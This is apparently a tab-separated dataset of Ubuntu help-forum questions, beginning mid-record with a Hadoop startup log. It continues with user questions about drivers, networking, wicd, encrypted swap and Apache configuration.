/contrib/capacity-scheduler/*.jar : /contrib/capacity-scheduler/*.jar startup_msg : build = https : //svn.apache.org/repos/asf/hadoop/common -r 1529768 ; compiled by 'hortonmu ' on 2013-10-07t06:28z startup_msg : java = 1.7.0_51 ************************************************************/ 14/03/24 20:29:54 info namenode.namenode : registered unix signal handlers for [ term , hup , int ] java hotspot ( tm ) 64-bit server vm warning : you have loaded library /home/hduser/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c ' , or link it with '-z noexecstack ' . 14/03/24 20:29:54 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable formatting using clusterid : cid-f3d89333-8217-48ce-9281-44b0caed76f9 14/03/24 20:29:55 info namenode.hostfilemanager : read includes : hostset ( ) 14/03/24 20:29:55 info namenode.hostfilemanager : read excludes : hostset ( ) 14/03/24 20:29:55 info blockmanagement.datanodemanager : dfs.block.invalidate.limit=1000 14/03/24 20:29:55 info util.gset : computing capacity for map blocksmap 14/03/24 20:29:55 info util.gset : vm type = 64-bit 14/03/24 20:29:55 info util.gset : 2.0 % max memory = 889 mb 14/03/24 20:29:55 info util.gset : capacity = 2^21 = 2097152 entries 14/03/24 20:29:55 info blockmanagement.blockmanager : dfs.block.access.token.enable=false 14/03/24 20:29:55 info blockmanagement.blockmanager : defaultreplication = 1 14/03/24 20:29:55 info blockmanagement.blockmanager : maxreplication = 512 14/03/24 20:29:55 info blockmanagement.blockmanager : minreplication = 1 14/03/24 20:29:55 info blockmanagement.blockmanager : maxreplicationstreams = 2 14/03/24 20:29:55 info blockmanagement.blockmanager : shouldcheckforenoughracks = false 14/03/24 20:29:55 info blockmanagement.blockmanager : replicationrecheckinterval = 3000 14/03/24 20:29:55 info blockmanagement.blockmanager : encryptdatatransfer = false 14/03/24 20:29:55 info namenode.fsnamesystem : fsowner = root ( auth : simple ) 14/03/24 20:29:55 info namenode.fsnamesystem : supergroup = supergroup 14/03/24 20:29:55 info namenode.fsnamesystem : ispermissionenabled = true 14/03/24 20:29:55 info namenode.fsnamesystem : ha enabled : false 14/03/24 20:29:55 info namenode.fsnamesystem : append enabled : true 14/03/24 20:29:55 info util.gset : computing capacity for map inodemap 14/03/24 20:29:55 info util.gset : vm type = 64-bit 14/03/24 20:29:55 info util.gset : 1.0 % max memory = 889 mb 14/03/24 20:29:55 info util.gset : capacity = 2^20 = 1048576 entries 14/03/24 20:29:55 info namenode.namenode : caching file names occuring more than 10 times 14/03/24 20:29:55 info namenode.fsnamesystem : dfs.namenode.safemode.threshold-pct = 0.9990000128746033 14/03/24 20:29:55 info namenode.fsnamesystem : dfs.namenode.safemode.min.datanodes = 0 14/03/24 20:29:55 info namenode.fsnamesystem : dfs.namenode.safemode.extension = 30000 14/03/24 20:29:55 info namenode.fsnamesystem : retry cache on namenode is enabled 14/03/24 20:29:55 info namenode.fsnamesystem : retry cache will use 0.03 of total heap and retry cache entry expiry time is 600000 millis 14/03/24 20:29:55 info util.gset : computing capacity for map namenode retry cache 14/03/24 20:29:55 info util.gset : vm type = 64-bit 14/03/24 20:29:55 info util.gset : 0.029999999329447746 % max memory = 889 mb 14/03/24 20:29:55 info util.gset : capacity = 2^15 = 32768 entries re-format filesystem in storage directory /app/hadoop/tmp/dfs/name ? ( y or n ) y 14/03/24 20:30:01 info common.storage : storage directory /app/hadoop/tmp/dfs/name has been successfully formatted . 14/03/24 20:30:01 info namenode.fsimage : saving image file /app/hadoop/tmp/dfs/name/current/fsimage.ckpt_0000000000000000000 using no compression 14/03/24 20:30:01 info namenode.fsimage : image file /app/hadoop/tmp/dfs/name/current/fsimage.ckpt_0000000000000000000 of size 196 bytes saved in 0 seconds . 14/03/24 20:30:01 info namenode.nnstorageretentionmanager : going to retain 1 images with txid > = 0 14/03/24 20:30:01 info util.exitutil : exiting with status 0 14/03/24 20:30:01 info namenode.namenode : shutdown_msg : /************************************************************ shutdown_msg : shutting down namenode at sandesh-inspiron-1564/127.0.1.1 ************************************************************/ now this is the error when i 'm executing the command ./start-all.sh hduser @ sandesh-inspiron-1564 : ~/hadoop $ ./sbin/start-all.sh this script is deprecated . instead use start-dfs.sh and start-yarn.sh 14/03/24 20:34:57 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable starting namenodes on [ java hotspot ( tm ) 64-bit server vm warning : you have loaded library /home/hduser/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c ' , or link it with '-z noexecstack ' . localhost ] sed : -e expression # 1 , char 6 : unknown option to `s' java : ssh : could not resolve hostname java : name or service not known vm : ssh : could not resolve hostname vm : name or service not known have : ssh : could not resolve hostname have : name or service not known loaded : ssh : could not resolve hostname loaded : name or service not known -c : unknown cipher type 'cd' the : ssh : could not resolve hostname the : name or service not known might : ssh : could not resolve hostname might : name or service not known stack : ssh : could not resolve hostname stack : name or service not known have : ssh : could not resolve hostname have : name or service not known guard : ssh : could not resolve hostname guard : name or service not known stack : ssh : could not resolve hostname stack : name or service not known library : ssh : could not resolve hostname library : name or service not known hotspot ( tm ) : ssh : could not resolve hostname hotspot ( tm ) : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known you : ssh : could not resolve hostname you : name or service not known server : ssh : could not resolve hostname server : name or service not known highly : ssh : could not resolve hostname highly : name or service not known that : ssh : could not resolve hostname that : name or service not known which : ssh : could not resolve hostname which : name or service not known will : ssh : could not resolve hostname will : name or service not known now . : ssh : could not resolve hostname now . : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known link : ssh : could not resolve hostname link : name or service not known library : ssh : could not resolve hostname library : name or service not known with : ssh : could not resolve hostname with : name or service not known the : ssh : could not resolve hostname the : name or service not known guard . : ssh : could not resolve hostname guard . : name or service not known fix : ssh : could not resolve hostname fix : name or service not known the : ssh : could not resolve hostname the : name or service not known with : ssh : could not resolve hostname with : name or service not known it : ssh : could not resolve hostname it : name or service not known 64-bit : ssh : could not resolve hostname 64-bit : name or service not known try : ssh : could not resolve hostname try : name or service not known ' , : ssh : could not resolve hostname ' , : name or service not known localhost : starting namenode , logging to /home/hduser/hadoop/logs/hadoop-hduser-namenode-sandesh-inspiron-1564.out to : ssh : connect to host to port 22 : connection refused warning : : ssh : could not resolve hostname warning : : name or service not known you : ssh : could not resolve hostname you : name or service not known fix : ssh : could not resolve hostname fix : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known or : ssh : could not resolve hostname or : name or service not known recommended : ssh : could not resolve hostname recommended : name or service not known vm : ssh : could not resolve hostname vm : name or service not known noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known localhost : starting datanode , logging to /home/hduser/hadoop/logs/hadoop-hduser-datanode-sandesh-inspiron-1564.out starting secondary namenodes [ java hotspot ( tm ) 64-bit server vm warning : you have loaded library /home/hduser/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c ' , or link it with '-z noexecstack ' . 0.0.0.0 ] sed : -e expression # 1 , char 6 : unknown option to `s' -c : unknown cipher type 'cd' java : ssh : could not resolve hostname java : name or service not known stack : ssh : could not resolve hostname stack : name or service not known server : ssh : could not resolve hostname server : name or service not known you : ssh : could not resolve hostname you : name or service not known have : ssh : could not resolve hostname have : name or service not known vm : ssh : could not resolve hostname vm : name or service not known fix : ssh : could not resolve hostname fix : name or service not known hotspot ( tm ) : ssh : could not resolve hostname hotspot ( tm ) : name or service not known warning : : ssh : could not resolve hostname warning : : name or service not known the authenticity of host '0.0.0.0 ( 0.0.0.0 ) ' ca n't be established . ecdsa key fingerprint is 89 : fb:3d:98:2c:6d:03 : c1 : a3 : de:96:3b:39 : bc : ca : b3 . are you sure you want to continue connecting ( yes/no ) ? loaded : ssh : could not resolve hostname loaded : name or service not known stack : ssh : could not resolve hostname stack : name or service not known have : ssh : could not resolve hostname have : name or service not known guard : ssh : could not resolve hostname guard : name or service not known library : ssh : could not resolve hostname library : name or service not known the : ssh : could not resolve hostname the : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known vm : ssh : could not resolve hostname vm : name or service not known 64-bit : ssh : could not resolve hostname 64-bit : name or service not known try : ssh : could not resolve hostname try : name or service not known you : ssh : could not resolve hostname you : name or service not known might : ssh : could not resolve hostname might : name or service not known the : ssh : could not resolve hostname the : name or service not known highly : ssh : could not resolve hostname highly : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known now . : ssh : could not resolve hostname now . : name or service not known that : ssh : could not resolve hostname that : name or service not known which : ssh : could not resolve hostname which : name or service not known guard . : ssh : could not resolve hostname guard . : name or service not known link : ssh : could not resolve hostname link : name or service not known library : ssh : could not resolve hostname library : name or service not known fix : ssh : could not resolve hostname fix : name or service not known the : ssh : could not resolve hostname the : name or service not known or : ssh : could not resolve hostname or : name or service not known with : ssh : could not resolve hostname with : name or service not known with : ssh : could not resolve hostname with : name or service not known recommended : ssh : could not resolve hostname recommended : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known it : ssh : could not resolve hostname it : name or service not known will : ssh : could not resolve hostname will : name or service not known ' , : ssh : could not resolve hostname ' , : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known to : ssh : connect to host to port 22 : connection refused output for ./start-dfs.sh hduser @ sandesh-inspiron-1564 : ~/hadoop $ ./sbin/start-dfs.sh 14/03/24 20:57:53 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable starting namenodes on [ java hotspot ( tm ) 64-bit server vm warning : you have loaded library /home/hduser/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c ' , or link it with '-z noexecstack ' . localhost ] sed : -e expression # 1 , char 6 : unknown option to `s' -c : unknown cipher type 'cd' 'execstack : ssh : could not resolve hostname 'execstack : name or service not known hotspot ( tm ) : ssh : could not resolve hostname hotspot ( tm ) : name or service not known now . : ssh : could not resolve hostname now . : name or service not known or : ssh : could not resolve hostname or : name or service not known might : ssh : could not resolve hostname might : name or service not known that : ssh : could not resolve hostname that : name or service not known library : ssh : could not resolve hostname library : name or service not known the : ssh : could not resolve hostname the : name or service not known recommended : ssh : could not resolve hostname recommended : name or service not known the : ssh : could not resolve hostname the : name or service not known it : ssh : could not resolve hostname it : name or service not known with : ssh : could not resolve hostname with : name or service not known ' , : ssh : could not resolve hostname ' , : name or service not known link : ssh : could not resolve hostname link : name or service not known you : ssh : could not resolve hostname you : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known the : ssh : could not resolve hostname the : name or service not known have : ssh : could not resolve hostname have : name or service not known you : ssh : could not resolve hostname you : name or service not known guard : ssh : could not resolve hostname guard : name or service not known guard . : ssh : could not resolve hostname guard . : name or service not known library : ssh : could not resolve hostname library : name or service not known will : ssh : could not resolve hostname will : name or service not known warning : : ssh : could not resolve hostname warning : : name or service not known fix : ssh : could not resolve hostname fix : name or service not known vm : ssh : could not resolve hostname vm : name or service not known localhost : starting namenode , logging to /home/hduser/hadoop/logs/hadoop-hduser-namenode-sandesh-inspiron-1564.out to : ssh : connect to host to port 22 : connection refused loaded : ssh : could not resolve hostname loaded : name or service not known vm : ssh : could not resolve hostname vm : name or service not known which : ssh : could not resolve hostname which : name or service not known stack : ssh : could not resolve hostname stack : name or service not known have : ssh : could not resolve hostname have : name or service not known fix : ssh : could not resolve hostname fix : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known try : ssh : could not resolve hostname try : name or service not known highly : ssh : could not resolve hostname highly : name or service not known 64-bit : ssh : could not resolve hostname 64-bit : name or service not known with : ssh : could not resolve hostname with : name or service not known java : ssh : could not resolve hostname java : name or service not known stack : ssh : could not resolve hostname stack : name or service not known server : ssh : could not resolve hostname server : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known localhost : starting datanode , logging to /home/hduser/hadoop/logs/hadoop-hduser-datanode-sandesh-inspiron-1564.out this output is for ./start-yarn.sh hduser @ sandesh-inspiron-1564 : ~/hadoop $ ./sbin/start-yarn.sh starting yarn daemons resourcemanager running as process 16118 . stop it first . localhost : nodemanager running as process 16238 . stop it first .
438588	are application layer protocols part of system utilities ?	are applications layer protocols like dhcp , http , dns , ftp , nfs , smb , etc part of system utilities like ls , cp , chmod , rm , mv , etc ?
438594	nvidia geforce 7150m issues on ubuntu 13.10	i have just completed a fresh installation of ubuntu 13.10 on my desktop and the installation was successful . my video card is an on-board nvidia geforce 7150m/630i and i was able to include the latest ppa from nvidia into the apt repository and did an apt-get install nvidia-current . this too went successful and is now showing that the latest driver of nvidia is active . the problem is that the screen has a very slight flicker , distortion and is oversized on the display by a few pixels . using the nouveau driver gives a crystal clear display and the size is also correct , but there seems to be a few bugs in the display rendering and i suppose it does not use gl so the speed is very slow . can you give me any assistance on finding the problem ? similar questions have been asked in this forum but nobody seems to struggle with the distortion and/or oversized screen display .
438595	problem with node.js installation	i am very new to linux so my question may seem stupid however i can not install node.js and npm software successfully . more precisely , the installation is completed but when i am trying to run some graphics software i get an error . in detail : i want to run this software which somehow enables node.js for rendering graphics : https : //github.com/clementfarabet/gfx.js and the problem occurs when i am trying to install luarocks ( found also in the above link ) . npm err ! pty.js @ 0.2.2 install : `node-gyp rebuild` npm err ! exit status 1 npm err ! npm err ! failed at the pty.js @ 0.2.2 install script . npm err ! this is most likely a problem with the pty.js package , npm err ! not with npm itself . npm err ! tell the author that this fails on your system : npm err ! node-gyp rebuild npm err ! you can get their info via : npm err ! npm owner ls pty.js npm err ! there is likely additional logging output above . npm err ! system linux 3.11.0-12-generic npm err ! command `` /usr/local/bin/node '' `` /usr/local/bin/npm '' `` install '' npm err ! cwd /tmp/luarocks_gfx.js-scm-0-9502/gfx.js npm err ! node -v v0.11.13-pre npm err ! npm -v 1.4.3 npm err ! code elifecycle also when i am trying to start the graphics mode i get the following error : [ gfx.js ] server started on port 8000 , graphics will be rendered into http : //localhost:8000 deep_unlearn @ deep : ~/node_modules $ module.js:333 throw err ; ^ error : can not find module 'pty.js' at function.module._resolvefilename ( module.js:331:15 ) at function.module._load ( module.js:273:25 ) at module.require ( module.js:357:17 ) at require ( module.js:373:17 ) at object . ( /home/deep_unlearn/.gfx.js/lib/tty.js:17:11 ) at module._compile ( module.js:449:26 ) at object.module._extensions..js ( module.js:467:10 ) at module.load ( module.js:349:32 ) at function.module._load ( module.js:305:12 ) at module.require ( module.js:357:17 ) i suspect that the problem is that npm can not find the pty.js module even though is installed in my system . so i looked for the path and i realized that the software is installed in the following structure : ~root/node_modules/express/node_modules/pty.js however the software seems to look for this files in : ~root/node_modules/ can someone please advice me on this matter ? if this is the problem is there a way to fix this problem ?
438596	how can i fix my desktop background setting ?	i am running ubuntu 13.10 . i installed gnome3 out of curiosity a few days back , from then my desktop background just went black . it wo n't change no matter what i do . i removed gnome completely and reinstalled unity . but the problem persists . hoping to find some help here . thanks in advance .
438597	how can i configure folder/file views in 12.04.4 ?	i would like to set up my user account folder view options to show as much information as ls -a does in a terminal window . is this possible ? and how ? if not , how close can i get ?
438598	use a radiolist with scriptreplay	i want to crate a programm using dialog that gives me a radiolist of logfiles ( working ) and automatically replays them using scriptreplay but i ca n't get it to work because the filepath that gets placed in the temp file includes these `` '' things thats why scriptreplay cant find the file and wo n't play it . i also need the programm to automatically select the right .log file ( they have the same name or i place them in the same directory ) that is used in the .timing file . # ! /bin/bash # clear _temp= '' /tmp/answer. $ $ '' string= '' '' counter=0 for i in $ ( ls /mnt/home/ $ user/shell_logs/*.log ) ; do let counter=counter+1 string= $ ( echo $ string \ '' $ i\ '' \ '' $ counter\ '' \ '' off\ '' ) done dialog -- backtitle `` radiolist '' -- radiolist `` test '' 0 0 0 $ string 2 > $ _temp result=`cat $ _temp` clear echo $ result
438599	problem with wireless connection ( realtek rtl819x )	i hardly ever use ubuntu in my life , but now it 's a problem for me ... i do n't know how am i solve this problem with my realtek rtl819x internet card . i hope somebody could help me . please if you write a solution , than write it down clearly to understand it ! thanks a lot ! : )
438601	ubuntu 14.04 nvidia propriatery driver install	i require some help and guidance in installing nvidia drivers on my system with dual intel/nvidia graphics processors . i am currently running ubuntu 14.04 , and i am aware that the os is in its late beta stage , however i perform daily updates . the os is running fine and smooth , so i can not say that i have experienced any problems . following the installation method from below i successfully installed the nvidia driver without any errors . however upon restarting the system i was presented with a black screen . following a solution , i blacklisted the nouveau driver and performed another restart whereupon i was presented with the logging screen , but in a 4:3 aspect ratio format . i was unable to continue the login to the unity desktop because the system froze and rendered the mouse and keyboard inoperable . following another solution , i then restarted the system in console mode where i proceeded to check the nvidia-xorg file . i noticed the settings looked odd as section `` device '' and screen were missing . i tried recreating the file as per instructions using nvidia-xconfig , but i received an error : unable to load x server display configuration page . at that point i gave up and reinstalled ubuntu . i repeated this process once more , but with no success . i am currently running ubuntu without the nvidia drivers and i disabled the card using the method apt-get install -- no-install-recommends bumblebee . however i would like to get the nvidia graphics card working . sudo apt-get purge libvdpau-va-gl1 sudo apt-get install nvidia-319 nvidia-settings-319 nvidia-prime hardware : dell inspiron 15r n5110 laptop intel i5 card 1 : intel hd graphics 3000 nvidia geforce gt525m ( `` nvidia gf108m [ geforce gt 525m ] '' ) software : x.org : 1.15.0 drivers : intel ( unloaded : fbdev , vesa ) resolution : 1366x768 @ 60.0 hz glx renderer : mesa dri intel sandybridge mobile glx version : 3.0 mesa 10.1.0
438604	unable to share internet using hostapd	i 'm able to connect to the access point created by hostapd bu i ca n't access the internet . this has already worked for me on an ubuntu laptop but now i 'm using a netbook with ubuntu too but it does n't work . here is my /etc/hostapd.conf : interface=ap0 driver=nl80211 ssid=adsl23445566 hw_mode=g channel=11 wpa=2 wpa_passphrase=passphrase and my /etc/dnsmasq : bind-interfaces interface=ap0 dhcp-range=192.168.150.2,192.168.150.10 i connect to the router using wpa_supplicant : network= { mode=0 proto=wpa2 key_mgmt=wpa-psk pairwise=ccmp group=ccmp ssid= '' the essid '' psk= '' the password '' bssid=00:08:5c : ef:2c:0a scan_ssid=1 } the script that starts the ap on my netbook : # ! /bin/bash # start # create ap intreface sudo iw phy phy0 interface add ap0 type __ap sudo ifconfig ap0 down sudo ifconfig ap0 hw ether 18:3f:47:95 : df:0b sudo ifconfig ap0 up # configure ip address for wlan sudo ifconfig ap0 192.168.150.1 # start dhcp/dns server sudo service dnsmasq restart # enable routing sudo sysctl net.ipv4.ip_forward=1 # enable nat sudo iptables -t nat -a postrouting -o ap0 -j masquerade # run access point daemon sudo hostapd /etc/hostapd.conf
438606	encrypted swap folder : errors at boot	the start of the thread is there -- > http : //ubuntuforums.org/showthread.php ? t=2212889 i am posting here in the hope that someone would kindly be able to provide me with more info and has happened and if the fix i provided is a good one or not . so , i have removed the swap partitions in 'fstab ' that were created during install process by commenting them in.my fstab looks like below , # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- gnome -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=735f6250-439d-4228-ade4-8ec133c73a74 /boot ext2 defaults 0 2 # /dev/mapper/ubuntu -- gnome -- vg-swap_1 none swap sw 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0 i have commented out the line 'cryptswap1 ' in /etc/crypttab crypttab : sda5_crypt uuid=e0d9b8f4-a482-4fcf-814c-b10da8408dab none luks # cryptswap1 /dev/dm-2 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 i am left with two partition : sda5 ( swap ) - uuid=e0d9b8f4-a482-4fcf-814c-b10da8408dab sda1 ( boot ) - uuid=735f6250-439d-4228-ade4-8ec133c73a74 i have rebooted my machine a couple of time and no issue . the error message /dev/mapper/ubuntu -- vg-swap_1 is not ready or not present ... . is not showing anymore . the system feels a lot snappier and the boot time has decrease . is this possibly related ? when i run : cat /proc/swaps i get only the 'zram ' pool created . its normal since i have it installed . if you have a look at the attached screenshot in my previous post , i had an extra line /dev/dm-3 . is it bad doctor ? finally , when i run free it shows , swap : 8174688 0 8174688 which leads me to think that this setup is more correct than the ones before . i am really not sure . my guess : i encrypted my home folder with a disk encryption during install . i think , this was the start of all my troubles and this is why i had swap encrypted a couple of times . the morale of the story is that if you encrypt your disk , you might not need to encrypt your home folder ? am i correct in saying that ? 1000 $ question : can i safely delete the two partitions below to get back the space ? cryptswap1 /dev/dm-2 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 /dev/mapper/ubuntu -- gnome -- vg-swap_1 none
438607	error running wicd-curses on fresh install of 13.10 server	after rebuilding a machine with a fresh install of 13.10 server , i see the following errors when trying to run wicd-curses : $ wicd-curses ca n't connect to the daemon , trying to start it automatically ... traceback ( most recent call last ) : file `` /usr/share/wicd/curses/wicd-curses.py '' , line 1043 , in < module > setup_dbus ( ) file `` /usr/share/wicd/curses/wicd-curses.py '' , line 1031 , in setup_dbus dbus_ifaces = dbusmanager.get_dbus_ifaces ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 36 , in get_dbus_ifaces return dbus_manager.get_dbus_ifaces ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 62 , in get_dbus_ifaces if not self._dbus_ifaces : connect_to_dbus ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 48 , in connect_to_dbus return dbus_manager.connect_to_dbus ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 79 , in connect_to_dbus proxy_obj = self._bus.get_object ( `` org.wicd.daemon '' , '/org/wicd/daemon ' ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.serviceunknown : the name org.wicd.daemon was not provided by any .service files error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 96 , in apport_excepthook dbus_service_unknown_analysis ( exc_obj , pr ) file `` /usr/lib/python2.7/dist-packages/apport_python_hook.py '' , line 172 , in dbus_service_unknown_analysis cp = configparser ( interpolation=none ) typeerror : __init__ ( ) got an unexpected keyword argument 'interpolation' original exception was : traceback ( most recent call last ) : file `` /usr/share/wicd/curses/wicd-curses.py '' , line 1043 , in < module > setup_dbus ( ) file `` /usr/share/wicd/curses/wicd-curses.py '' , line 1031 , in setup_dbus dbus_ifaces = dbusmanager.get_dbus_ifaces ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 36 , in get_dbus_ifaces return dbus_manager.get_dbus_ifaces ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 62 , in get_dbus_ifaces if not self._dbus_ifaces : connect_to_dbus ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 48 , in connect_to_dbus return dbus_manager.connect_to_dbus ( ) file `` /usr/lib/python2.7/dist-packages/wicd/dbusmanager.py '' , line 79 , in connect_to_dbus proxy_obj = self._bus.get_object ( `` org.wicd.daemon '' , '/org/wicd/daemon ' ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.serviceunknown : the name org.wicd.daemon was not provided by any .service files it seems that wicd is not running . pgrep wicd returns no results . attempting to start it fails : $ sudo /etc/init.d/wicd start * starting network connection manager wicd [ fail ] if i attempt to run wicd directly , i see : $ sudo wicd traceback ( most recent call last ) : file `` /usr/share/wicd/daemon/wicd-daemon.py '' , line 1859 , in < module > main ( sys.argv ) file `` /usr/share/wicd/daemon/wicd-daemon.py '' , line 1708 , in main os.symlink ( dest , backup_location ) oserror : [ errno 17 ] file exists running wicd -foe gives the same output . exact package versions are : python-wicd 1.7.2.4-4.1 wicd-curses 1.7.2.4-4.1 wicd-daemon 1.7.2.4-4.1 the /var/log/wicd/ directory is empty . i tried reinstalling : sudo apt-get remove wicd-curses sudo apt-get autoremove sudo rm -rf /etc/wicd sudo rm -rf /var/log/wicd sudo reboot now sudo apt-get install wicd-curses however this did n't help . during the installation : get:1 http : //gb.archive.ubuntu.com/ubuntu/ saucy/main python-gobject all 3.10.0-1ubuntu1 [ 2,476 b ] get:2 http : //gb.archive.ubuntu.com/ubuntu/ saucy/universe python-wicd all 1.7.2.4-4.1 [ 39.3 kb ] get:3 http : //gb.archive.ubuntu.com/ubuntu/ saucy/universe wicd-daemon all 1.7.2.4-4.1 [ 217 kb ] get:4 http : //gb.archive.ubuntu.com/ubuntu/ saucy/universe python-urwid i386 1.1.1-1 [ 662 kb ] get:5 http : //gb.archive.ubuntu.com/ubuntu/ saucy/main rfkill i386 0.4-2ubuntu1 [ 9,160 b ] get:6 http : //gb.archive.ubuntu.com/ubuntu/ saucy/universe wicd-curses all 1.7.2.4-4.1 [ 35.0 kb ] fetched 964 kb in 0s ( 1,234 kb/s ) preconfiguring packages ... selecting previously unselected package python-gobject . ( reading database ... 60265 files and directories currently installed . ) unpacking python-gobject ( from ... /python-gobject_3.10.0-1ubuntu1_all.deb ) ... selecting previously unselected package python-wicd . unpacking python-wicd ( from ... /python-wicd_1.7.2.4-4.1_all.deb ) ... selecting previously unselected package wicd-daemon . unpacking wicd-daemon ( from ... /wicd-daemon_1.7.2.4-4.1_all.deb ) ... selecting previously unselected package python-urwid . unpacking python-urwid ( from ... /python-urwid_1.1.1-1_i386.deb ) ... selecting previously unselected package rfkill . unpacking rfkill ( from ... /rfkill_0.4-2ubuntu1_i386.deb ) ... selecting previously unselected package wicd-curses . unpacking wicd-curses ( from ... /wicd-curses_1.7.2.4-4.1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up python-gobject ( 3.10.0-1ubuntu1 ) ... setting up python-wicd ( 1.7.2.4-4.1 ) ... setting up wicd-daemon ( 1.7.2.4-4.1 ) ... * restarting network connection manager wicd [ fail ] setting up python-urwid ( 1.1.1-1 ) ... setting up rfkill ( 0.4-2ubuntu1 ) ... setting up wicd-curses ( 1.7.2.4-4.1 ) ... after this the failure is the behaviour is identical to that shown above . digging into the python code a little shows where the problem is occurring . from line 1708 in /usr/share/wicd/daemon/wicd-daemon.py : # back up resolv.conf before we do anything else try : backup_location = wpath.varlib + 'resolv.conf.orig' # do n't back up if .orig exists , probably there cause # wicd exploded if not os.path.exists ( backup_location ) : if os.path.islink ( '/etc/resolv.conf ' ) : dest = os.readlink ( '/etc/resolv.conf ' ) os.symlink ( dest , backup_location ) < -- - line 1708 else : shutil.copy2 ( '/etc/resolv.conf ' , backup_location ) os.chmod ( backup_location , 0644 ) except ioerror : print 'error backing up resolv.conf' debugging this code shows dest = ../run/resolvconf/resolv.conf backup_location = /var/lib/wicd/resolv.conf.orig i attempted changing the except block to catch both oserror and ioerror . i now see the error message error backing up resolv.conf , however the daemon does n't seem to start properly . $ sudo wicd error backing up resolv.conf $ echo $ ? 0 $ ps -ef | grep `` wi [ c ] d '' it seems that the .pid file was created and not deleted . attempting to run wicd another time gives : $ sudo wicd error backing up resolv.conf it seems like the daemon is already running . if it is not , please remove /var/run/wicd/wicd.pid and try again . it is not running . ps shows that , and wicd-curses gives the same error as above .
438608	conky does not starting automatically after boot	in start up applications i already given a command to start conky automatically after boot.but it does not starting after boot automatically.i have to manually start it every time.please help .
438609	where can i find the pkcs11 library for armhf ?	i am looking for the pkcs11 library for using gemalto idprime .net smartcards on ubuntu 13.04 armhf . the listed libraries for ubuntu : http : //ppa.launchpad.net/gemaltocrypto/dotnet+2.2.0.12/ubuntu/dists/raring/main/binary-armhf/packages does not show the armhf libraries . can anyone point me to the right page to download the library for armhf ?
438610	configure apache for home network	i 'm on u13.10 and have installed lamp per the tux tweaks instructions ( see their website -- apparently i 'm not yet allowed to post the actual link ) . then i followed tux tweaks instructions on configuring apache for custom home directory access : ( again , not allowed to post link , but see `` how to configure apache web server on linux '' . ) all of this is just fine and i 've got various directories in my home folder able to be accessed simply by going to , e.g. , http : //mywebdevdir/ which is pointing to /home/me/mywebdevdir/ my issue is i 've got a home network running open ssh server , and that computer 's apache can not do this trick . if the ssh server is on 192.168.0.x then http : //192.168.0.x/mywebdevdir/ can not be accessed/seen -- although http : //192.168.0.x/ goes to the default /var/www/ ... just fine . any ideas how i can extend the configuration to home directory access across home network ?
